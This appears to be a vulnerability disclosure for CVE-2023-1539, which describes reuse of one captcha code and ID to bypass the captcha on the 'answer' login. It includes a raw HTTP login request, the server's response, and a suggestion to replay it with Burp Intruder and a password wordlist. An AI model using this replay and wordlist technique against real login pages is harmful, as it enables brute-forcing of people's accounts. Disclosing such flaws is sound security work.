CVE-2023-1539: Captcha Bypass on login in answer

Description

So if we login incorrectly multiple times, we get captcha. Each captcha has “captcha_id” and solve “captcha_code” For example: “captcha_code":"8awt” “captcha_id":"7nToXDrT6SkJ2BJxKG1u” You can use same captcha code and captcha id in login without any problem

Captcha is generated with - http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Proof of Concept

Login multiple times and get any captcha Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Type captcha code and login

Your request:

POST /answer/api/v1/user/login/email HTTP/1.1
Host: 34.245.133.152:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 
Content-Type: application/json
Content-Length: 105
Origin: http://34.245.133.152:9080
Connection: close
Referer: http://34.245.133.152:9080/users/login

{"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
----------------------------------------------------------------

Use this request as long as you want, with same captcha_code and same captcha_id

Response you will get each time:
----------------------------------------------------------------
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Date: Tue, 21 Feb 2023 12:44:12 GMT
Content-Length: 186
Connection: close

{"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}

You can use burpsuite and send it to intruder and add wordlist then check with 1000 requests. Result will be same.

Impact

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a “captcha_code,” which is the code the user must enter to prove they are human, and a “captcha_id,” which is a unique identifier for that particular captcha. Once a attacker solves 1 captcha, they can use the same “captcha_code” and “captcha_id” for subsequent login attempts without any issue.